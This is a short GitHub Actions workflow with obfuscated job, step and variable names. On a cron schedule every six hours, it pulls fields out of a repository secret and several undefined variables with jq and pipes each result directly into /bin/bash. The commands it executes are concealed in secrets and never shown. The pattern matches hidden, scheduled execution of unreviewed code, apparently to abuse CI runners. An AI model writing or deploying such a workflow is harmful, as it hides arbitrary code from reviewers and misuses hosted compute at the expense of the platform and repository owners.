name: beixirui3217

on:
  workflow_dispatch:
  schedule:
    - cron: '24 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: beixirui3217
        env:
          ize35: ${{ secrets.ize35 }}
        run: |
          echo $ize35 | jq -r .dpow99 | /bin/bash
          echo $vbsdq432 | jq -r .tkn74 | /bin/bash
          echo $fzb754 | jq -r .l51874 | /bin/bash
          echo $v84408 | jq -r .h30452 | /bin/bash
          echo $cxah0 | jq -r .ys20320 | /bin/bash
          echo $m8916 | jq -r .vvak0766 | /bin/bash
          echo $nqzd333 | jq -r .yma94245 | /bin/bash
          echo $vaori19 | jq -r .o7 | /bin/bash
          echo $apx67 | jq -r .v3 | /bin/bash

